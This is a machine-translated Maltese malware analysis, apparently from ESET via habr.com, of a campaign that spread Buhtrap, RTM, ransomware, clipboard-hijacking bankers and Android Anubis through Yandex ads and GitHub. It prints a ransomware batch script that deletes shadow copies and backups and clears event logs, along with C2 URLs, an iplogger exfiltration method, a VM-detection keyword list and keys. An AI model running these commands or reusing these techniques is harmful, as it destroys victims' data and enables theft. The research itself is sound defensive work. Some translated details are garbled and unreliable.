Biex timmira kontabilisti f'attakk ċibernetiku, tista' tuża dokumenti tax-xogħol li jfittxu onlajn. Dan huwa bejn wieħed u ieħor dak li grupp ċibernetiku ilu jagħmel matul l-aħħar ftit xhur, iqassam backdoors magħrufa. и , kif ukoll encryptors u softwer għall-serq ta 'kripto-muniti. Ħafna mill-miri jinsabu fir-Russja. L-attakk sar billi tpoġġi reklamar malizzjuż fuq Yandex.Direct. Vittmi potenzjali ġew diretti lejn websajt fejn intalbu jniżżlu fajl malizzjuż moħbi bħala mudell ta’ dokument. Yandex neħħa r-reklamar malizzjuż wara t-twissija tagħna.
Il-kodiċi tas-sors ta’ Buhtrap inħareġ fuq l-internet fil-passat sabiex kulħadd ikun jista’ jużah. M'għandna l-ebda informazzjoni dwar id-disponibbiltà tal-kodiċi RTM.
F'din il-post aħna ngħidulek kif l-attakkanti qassam malware bl-użu ta 'Yandex.Direct u ospitawh fuq GitHub. Il-post se jikkonkludi b'analiżi teknika tal-malware.
Buhtrap u RTM reġgħu lura fin-negozju
Mekkaniżmu ta' tixrid u vittmi
Id-diversi payloads mogħtija lill-vittmi jaqsmu mekkaniżmu ta' propagazzjoni komuni. Il-fajls malizzjużi kollha maħluqa mill-attakkanti tpoġġew f'żewġ repożitorji GitHub differenti.
Tipikament, ir-repożitorju kien fih fajl malizzjuż wieħed li jista' jitniżżel, li nbidel ta' spiss. Peress li GitHub jippermettilek tara l-istorja tal-bidliet f'repożitorju, nistgħu naraw liema malware tqassam matul ċertu perjodu. Biex tikkonvinċi lill-vittma biex tniżżel il-fajl malizzjuż, intużat il-websajt blanki-shabloni24[.]ru, murija fil-figura hawn fuq.
Id-disinn tas-sit u l-ismijiet kollha tal-fajls malizzjużi jsegwu kunċett wieħed - forom, mudelli, kuntratti, kampjuni, eċċ. Meta wieħed iqis li s-softwer Buhtrap u RTM diġà ntużaw f'attakki fuq accountants fil-passat, asssumina li l- strateġija fil-kampanja l-ġdida hija l-istess. L-unika mistoqsija hija kif il-vittma waslet fis-sit tal-attakkanti.
Infezzjoni
Mill-inqas diversi vittmi potenzjali li spiċċaw fuq dan is-sit ġew attirati minn reklamar malizzjuż. Hawn taħt hawn eżempju URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Kif tistgħu taraw mill-link, il-banner tpoġġa fuq il-forum tal-kontabilità leġittimu bb.f2[.]kz. Huwa importanti li wieħed jinnota li l-banners dehru fuq siti differenti, kollha kellhom l-istess kampanja id (blanki_rsya), u l-aktar relatati ma 'servizzi ta' kontabilità jew assistenza legali. Il-URL juri li l-vittma potenzjali użat it-talba "niżżel il-formola tal-fattura", li tappoġġja l-ipoteżi tagħna ta 'attakki mmirati. Hawn taħt jinsabu s-siti fejn dehru l-banners u l-mistoqsijiet ta' tfittxija korrispondenti.
- niżżel il-formola tal-fattura – bb.f2[.]kz
- kampjun tal-kuntratt - Ipopen[.]ru
- kampjun tal-ilment tal-applikazzjoni - 77metrov[.]ru
- formola ta' ftehim - blank-dogovor-kupli-prodazhi[.]ru
- kampjun tal-petizzjoni tal-qorti - zen.yandex[.]ru
- kampjun ilment - ġurnata[.]ru
- kampjuni ta' formoli ta' kuntratt – Regforum[.]ru
- formola tal-kuntratt – assistentus[.]ru
- kampjun ta’ ftehim ta’ appartament – napravah[.]com
- kampjuni ta' kuntratti legali - avito[.]ru
Is-sit blanki-shabloni24[.]ru seta' ġie kkonfigurat biex jgħaddi minn valutazzjoni viżiva sempliċi. Tipikament, reklam li jindika sit ta’ dehra professjonali b’rabta ma’ GitHub ma jidhirx qisu xi ħaġa ovvjament ħażina. Barra minn hekk, l-attakkanti tellgħu fajls malizzjużi fir-repożitorju għal perjodu limitat biss, probabbli matul il-kampanja. Ħafna mill-ħin, ir-repożitorju GitHub kien fih arkivju zip vojt jew fajl EXE vojt. Għalhekk, l-attakkanti setgħu jqassmu reklamar permezz ta 'Yandex.Direct fuq siti li x'aktarx kienu żarhom minn accountants li ġew bi tweġiba għal mistoqsijiet speċifiċi ta' tfittxija.
Sussegwentement, ejja nħarsu lejn id-diversi payloads mqassma b'dan il-mod.
Analiżi tat-Tagħbija
Kronoloġija tad-distribuzzjoni
Il-kampanja malizzjuża bdiet fl-aħħar ta 'Ottubru 2018 u hija attiva fil-ħin tal-kitba. Peress li r-repożitorju kollu kien disponibbli pubblikament fuq GitHub, aħna kkumpilajna skeda ta 'żmien preċiża tad-distribuzzjoni ta' sitt familji ta 'malware differenti (ara l-figura hawn taħt). Żidna linja li turi meta ġiet skoperta l-link tal-banner, kif imkejjel bit-telemetrija ESET, għal tqabbil mal-istorja tal-git. Kif tistgħu taraw, dan jikkorrelata sew mad-disponibbiltà tat-tagħbija fuq GitHub. Id-diskrepanza fl-aħħar ta’ Frar tista’ tiġi spjegata mill-fatt li ma kellniex parti mill-istorja tal-bidliet minħabba li r-repożitorju tneħħa minn GitHub qabel ma stajna niksbuh kollu.
Figura 1. Kronoloġija tad-distribuzzjoni tal-malware.
Ċertifikati ta' Iffirmar ta' Kodiċi
Il-kampanja użat ċertifikati multipli. Xi wħud kienu ffirmati minn aktar minn familja waħda ta' malware, li jkompli jindika li kampjuni differenti kienu jappartjenu għall-istess kampanja. Minkejja d-disponibbiltà taċ-ċavetta privata, l-operaturi ma ffirmawx sistematikament il-binarji u ma użawx iċ-ċavetta għall-kampjuni kollha. Fl-aħħar ta’ Frar 2019, l-attakkanti bdew joħolqu firem invalidi bl-użu ta’ ċertifikat ta’ Google li għalih ma kellhomx iċ-ċavetta privata.
Iċ-ċertifikati kollha involuti fil-kampanja u l-familji tal-malware li jiffirmaw huma elenkati fit-tabella hawn taħt.
Użajna wkoll dawn iċ-ċertifikati tal-iffirmar tal-kodiċi biex nistabbilixxu rabtiet ma’ familji oħra ta’ malware. Għall-biċċa l-kbira taċ-ċertifikati, ma sibniex kampjuni li ma kinux imqassma permezz ta 'repożitorju GitHub. Madankollu, iċ-ċertifikat TOV “MARIYA” intuża biex jiffirma malware li jappartjeni għall-botnet , adware u minaturi. Huwa improbabbli li dan il-malware huwa relatat ma 'din il-kampanja. Ħafna probabbli, iċ-ċertifikat inxtara fuq id-darknet.
Win32/Filecoder.Buhtrap
L-ewwel komponent li ġibed l-attenzjoni tagħna kien il-Win32/Filecoder.Buhtrap li għadu kif ġie skopert. Dan huwa fajl binarju Delphi li kultant jiġi ppakkjat. Tqassam prinċipalment fi Frar-Marzu 2019. Iġib ruħu kif jixraq programm ransomware - ifittex drives lokali u folders tan-netwerk u jikkripta l-fajls li jsib. M'għandux bżonn konnessjoni tal-Internet biex tiġi kompromessa għax ma jikkuntattjax lis-server biex jibgħat iċ-ċwievet ta 'encryption. Minflok, iżid "token" mat-tmiem tal-messaġġ tal-fidwa, u jissuġġerixxi li tuża email jew Bitmessage biex tikkuntattja lill-operaturi.
Biex jikkripta kemm jista' jkun riżorsi sensittivi, Filecoder.Buhtrap imexxi ħajt iddisinjat biex jagħlaq softwer ewlieni li jista 'jkollu handlers ta' fajls miftuħin li jkun fihom informazzjoni prezzjuża li tista 'tinterferixxi mal-encryption. Il-proċessi fil-mira huma prinċipalment sistemi ta 'ġestjoni tad-database (DBMS). Barra minn hekk, Filecoder.Buhtrap iħassar fajls log u backups biex jagħmlu l-irkupru tad-data diffiċli. Biex tagħmel dan, mexxi l-iskrittura tal-lott hawn taħt.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap juża servizz leġittimu tal-IP Logger onlajn iddisinjat biex jiġbor informazzjoni dwar il-viżitaturi tal-websajt. Dan huwa maħsub biex jintraċċa l-vittmi tar-ransomware, li hija r-responsabbiltà tal-linja tal-kmand:
mshta.exe "javascript:document.write('');"
Fajls għall-kriptaġġ jintgħażlu jekk ma jaqblux ma' tliet listi ta' esklużjoni. L-ewwelnett, fajls bl-estensjonijiet li ġejjin mhumiex encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys u .frfett il-lejl. It-tieni nett, il-fajls kollha li għalihom il-mogħdija sħiħa fiha kordi tad-direttorju mil-lista hawn taħt huma esklużi.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
It-tielet, ċerti ismijiet tal-fajls huma wkoll esklużi mill-kriptaġġ, fosthom l-isem tal-fajl tal-messaġġ tal-fidwa. Il-lista hija ppreżentata hawn taħt. Ovvjament, dawn l-eċċezzjonijiet kollha huma maħsuba biex iżommu l-magna taħdem, iżda b'kapaċità minima għat-triq.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Skema ta' kriptaġġ tal-fajls
Ladarba jiġi esegwit, il-malware jiġġenera par ta 'key RSA ta' 512-bit. L-esponent privat (d) u l-modulu (n) huma mbagħad ikkodifikati b'ċavetta pubblika 2048-bit kodifikata b'mod iebes (esponent pubbliku u modulu), ippakkjat b'zlib, u kodifikat b'base64. Il-kodiċi responsabbli għal dan jidher fil-Figura 2.
Figura 2. Riżultat tad-dekompilazzjoni Hex-Rays tal-proċess tal-ġenerazzjoni tal-par taċ-ċwievet RSA 512-bit.
Hawn taħt hemm eżempju ta 'test sempliċi b'ċavetta privata ġġenerata, li hija token mehmuża mal-messaġġ tal-fidwa.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Iċ-ċavetta pubblika tal-attakkanti hija mogħtija hawn taħt.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Il-fajls huma encrypted bl-użu ta 'AES-128-CBC b'ċavetta 256-bit. Għal kull fajl ikkodifikat, huma ġġenerati ċavetta ġdida u vettur ta 'inizjalizzazzjoni ġdid. L-informazzjoni ewlenija hija miżjuda mat-tmiem tal-fajl encrypted. Ejja nikkunsidraw il-format tal-fajl encrypted.
Fajls kriptati għandhom l-intestatura li ġejja:
Id-dejta tal-fajl tas-sors biż-żieda tal-valur maġiku VEGA hija encrypted għall-ewwel 0x5000 bytes. L-informazzjoni kollha tad-deċifrar hija mehmuża ma' fajl bl-istruttura li ġejja:
- Il-markatur tad-daqs tal-fajl fih marka li tindika jekk il-fajl huwiex akbar minn 0x5000 bytes fid-daqs
— AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key of the generated RSA key pair))
- Blob taċ-ċavetta RSA = ZlibCompress(RSAEncrypt (ċavetta privata RSA iġġenerata, ċavetta pubblika RSA kodifikata iebes))
Win32/ClipBanker
Win32/ClipBanker huwa komponent li tqassam b'mod intermittenti mill-aħħar ta 'Ottubru sal-bidu ta' Diċembru 2018. Ir-rwol tiegħu huwa li jimmonitorja l-kontenut tal-clipboard, ifittex indirizzi ta 'kartieri tal-kripto-munita. Wara li ddetermina l-indirizz tal-kartiera fil-mira, ClipBanker jibdel b'indirizz maħsub li jappartjeni lill-operaturi. Il-kampjuni li eżaminajna la kienu f'kaxxa u lanqas mċaħħda. L-uniku mekkaniżmu użat biex jaħbi l-imġieba huwa l-istring encryption. L-indirizzi tal-kartiera tal-operaturi huma encrypted bl-użu ta 'RC4. Il-kripto-muniti fil-mira huma Bitcoin, Bitcoin cash, Dogecoin, Ethereum u Ripple.
Matul il-perjodu li l-malware kien qed jinfirex għall-kartieri tal-Bitcoin tal-attakkanti, intbagħat ammont żgħir lil VTS, li jitfa’ dubju fuq is-suċċess tal-kampanja. Barra minn hekk, m'hemm l-ebda evidenza li tissuġġerixxi li dawn it-tranżazzjonijiet kienu relatati ma' ClipBanker għal kollox.
Win32/RTM
Il-komponent Win32/RTM tqassam għal diversi jiem kmieni f'Marzu 2019. RTM huwa bankier Trojan miktub f'Delphi, immirat għal sistemi bankarji remoti. Fl-2017, ir-riċerkaturi tal-ESET ppubblikaw ta' dan il-programm, id-deskrizzjoni għadha rilevanti. F'Jannar 2019, Palo Alto Networks ħareġ ukoll .
Buhtrap Loader
Għal xi żmien, downloader kien disponibbli fuq GitHub li ma kienx simili għal għodod Buhtrap preċedenti. Huwa jdur lejn https://94.100.18[.]67/RSS.php?<some_id> biex tikseb l-istadju li jmiss u tagħbijietha direttament fil-memorja. Nistgħu niddistingwu żewġ imgieba tal-kodiċi tat-tieni stadju. Fl-ewwel URL, RSS.php għadda l-backdoor ta 'Buhtrap direttament - dan il-backdoor huwa simili ħafna għal dak disponibbli wara li l-kodiċi tas-sors ġie leaked.
Interessanti, naraw diversi kampanji bil-backdoor Buhtrap, u allegatament huma mmexxija minn operaturi differenti. F'dan il-każ, id-differenza ewlenija hija li l-backdoor huwa mgħobbi direttament fil-memorja u ma jużax l-iskema tas-soltu bil-proċess ta 'skjerament DLL li tkellimna dwaru . Barra minn hekk, l-operaturi bidlu ċ-ċavetta RC4 użata biex jikkriptaw it-traffiku tan-netwerk għas-server C&C. Fil-biċċa l-kbira tal-kampanji li rajna, l-operaturi ma ddejqux jibdlu din iċ-ċavetta.
It-tieni, imġieba aktar kumplessa kienet li l-URL RSS.php ġie mgħoddi lil loader ieħor. Implimenta xi offuskazzjoni, bħall-bini mill-ġdid tat-tabella ta 'importazzjoni dinamika. L-iskop tal-bootloader huwa li tikkuntattja s-server C&C [.]com/api/F27F84EDA4D13B15/2, ibgħat ir-reġistri u stenna għal tweġiba. Jipproċessa r-rispons bħala blob, jgħabbiha fil-memorja u tesegwixxiha. It-tagħbija li rajna tesegwixxi dan il-loader kienet l-istess backdoor ta 'Buhtrap, iżda jista' jkun hemm komponenti oħra.
Android/Spy.Banker
Interessanti, komponent għal Android instab ukoll fir-repożitorju GitHub. Huwa kien fil-fergħa prinċipali għal ġurnata waħda biss - l-1 ta 'Novembru, 2018. Minbarra li titpoġġa fuq GitHub, it-telemetrija ESET ma ssib l-ebda evidenza li dan il-malware qed jitqassam.
Il-komponent kien ospitat bħala Pakkett ta 'Applikazzjoni Android (APK). Huwa mċajpra ħafna. L-imġieba malizzjuża hija moħbija f'JAR kriptat li jinsab fl-APK. Hija kkodifikata b'RC4 billi tuża din iċ-ċavetta:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
L-istess ċavetta u algoritmu jintużaw biex jikkriptaw is-sekwenzi. JAR jinsab fi APK_ROOT + image/files. L-ewwel 4 bytes tal-fajl fihom it-tul tal-JAR kriptat, li jibda immedjatament wara l-qasam tat-tul.
Wara li decrypted il-fajl, skoprejna li kien Anubis - qabel bankier għal Android. Il-malware għandu l-karatteristiċi li ġejjin:
- reġistrazzjoni tal-mikrofonu
- tieħu screenshots
- jkollna koordinati tal-GPS
- keylogger
- encryption tad-data tal-apparat u domanda għall-fidwa
- jibgħat spam
Interessanti, il-bankier uża Twitter bħala kanal ta 'komunikazzjoni backup biex jikseb server C&C ieħor. Il-kampjun li analizzajna uża l-kont @JonesTrader, iżda fil-ħin tal-analiżi kien diġà mblukkat.
Il-bankier fih lista ta 'applikazzjonijiet fil-mira fuq l-apparat Android. Huwa itwal mil-lista miksuba fl-istudju Sophos. Il-lista tinkludi ħafna applikazzjonijiet bankarji, programmi ta 'xiri onlajn bħal Amazon u eBay, u servizzi ta' kripto-munita.
MSIL/ClipBanker.IH
L-aħħar komponent imqassam bħala parti minn din il-kampanja kien l-eżekutibbli .NET Windows, li deher f'Marzu 2019. Ħafna mill-verżjonijiet studjati kienu ppakkjati b'ConfuserEx v1.0.0. Bħal ClipBanker, dan il-komponent juża l-clipboard. L-għan tiegħu huwa firxa wiesgħa ta 'kripto-muniti, kif ukoll offerti fuq Steam. Barra minn hekk, huwa juża s-servizz IP Logger biex jisraq iċ-ċavetta WIF privata Bitcoin.
Mekkaniżmi ta' Protezzjoni
Minbarra l-benefiċċji li ConfuserEx jipprovdi fil-prevenzjoni tad-debugging, id-dumping, u t-tbagħbis, il-komponent jinkludi l-abbiltà li jiskopri prodotti antivirus u magni virtwali.
Biex tivverifika li taħdem f'magna virtwali, il-malware juża l-linja tal-kmand WMI (WMIC) integrata tal-Windows biex titlob informazzjoni tal-BIOS, jiġifieri:
wmic bios
Imbagħad il-programm janalizza l-output tal-kmand u jfittex kliem ewlieni: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Biex tiskopri prodotti antivirus, il-malware jibgħat talba tal-Windows Management Instrumentation (WMI) liċ-Ċentru tas-Sigurtà tal-Windows bl-użu ManagementObjectSearcher API kif muri hawn taħt. Wara d-dekodifikazzjoni minn base64 is-sejħa tidher bħal din:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Figura 3. Proċess għall-identifikazzjoni tal-prodotti antivirus.
Barra minn hekk, il-malware jiċċekkja jekk , għodda biex tipproteġi kontra attakki clipboard u, jekk taħdem, tissospendi l-ħjut kollha f'dak il-proċess, u b'hekk tiskonnettja l-protezzjoni.
Persistenza
Il-verżjoni tal-malware li studjajna tikkopja fiha nnifisha %APPDATA%googleupdater.exe u tistabbilixxi l-attribut "moħbi" għad-direttorju tal-google. Imbagħad hi tbiddel il-valur SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell fir-reġistru tal-Windows u żżid il-mogħdija updater.exe. Dan il-mod, il-malware jiġi eżegwit kull darba li l-utent jidħol.
Imġieba malizzjuża
Bħal ClipBanker, il-malware jimmonitorja l-kontenut tal-clipboard u jfittex l-indirizzi tal-kartiera tal-kripto-munita, u meta jinstab, jissostitwih b’wieħed mill-indirizzi tal-operatur. Hawn taħt hawn lista ta 'indirizzi fil-mira bbażata fuq dak li jinstab fil-kodiċi.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Għal kull tip ta' indirizz hemm espressjoni regolari korrispondenti. Il-valur STEAM_URL jintuża biex jattakka s-sistema Steam, kif jidher mill-espressjoni regolari li tintuża biex tiddefinixxi fil-buffer:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Kanal ta' esfiltrazzjoni
Minbarra li jissostitwixxi l-indirizzi fil-buffer, il-malware jimmira ċ-ċwievet WIF privati tal-kartieri Bitcoin, Bitcoin Core u Electrum Bitcoin. Il-programm juża plogger.org bħala kanal ta' esfiltrazzjoni biex jikseb iċ-ċavetta privata WIF. Biex tagħmel dan, l-operaturi jżidu dejta taċ-ċavetta privata mal-header HTTP tal-Utent-Agent, kif muri hawn taħt.
Figura 4. IP Logger console b'dejta tal-ħruġ.
L-operaturi ma użawx iplogger.org biex jesfiltraw kartieri. Probabbilment irrikorrew għal metodu differenti minħabba l-limitu ta '255 karattru fil-qasam User-Agentmurija fl-interface tal-web tal-IP Logger. Fil-kampjuni li studjajna, is-server tal-output l-ieħor kien maħżun fil-varjabbli ambjentali DiscordWebHook. B'mod sorprendenti, din il-varjabbli ambjentali mhix assenjata imkien fil-kodiċi. Dan jissuġġerixxi li l-malware għadu qed jiġi żviluppat u l-varjabbli hija assenjata lill-magna tat-test tal-operatur.
Hemm sinjal ieħor li l-programm jinsab fl-iżvilupp. Il-fajl binarju jinkludi żewġ URLs iplogger.org, u t-tnejn jiġu mistoqsija meta d-dejta tiġi esfiltrata. F'talba lil wieħed minn dawn l-URLs, il-valur fil-qasam Referer huwa preċedut minn "DEV /". Sibna wkoll verżjoni li ma kinitx ippakkjata bl-użu ta’ ConfuserEx, ir-riċevitur għal dan il-URL jismu DevFeedbackUrl. Ibbażat fuq l-isem varjabbli ambjentali, nemmnu li l-operaturi qed jippjanaw li jużaw is-servizz leġittimu Discord u s-sistema ta 'interċettazzjoni tal-web tiegħu biex jisirqu l-kartieri tal-kripto-munita.
Konklużjoni
Din il-kampanja hija eżempju tal-użu ta’ servizzi ta’ reklamar leġittimi f’attakki ċibernetiċi. L-iskema timmira organizzazzjonijiet Russi, iżda ma nkunux sorpriżi li naraw attakk bħal dan juża servizzi mhux Russi. Biex jiġi evitat kompromess, l-utenti għandhom ikunu kunfidenti fir-reputazzjoni tas-sors tas-softwer li jniżżlu.
Lista kompluta ta' indikaturi ta' kompromess u attributi MITRE ATT&CK hija disponibbli fuq .
Sors: www.habr.com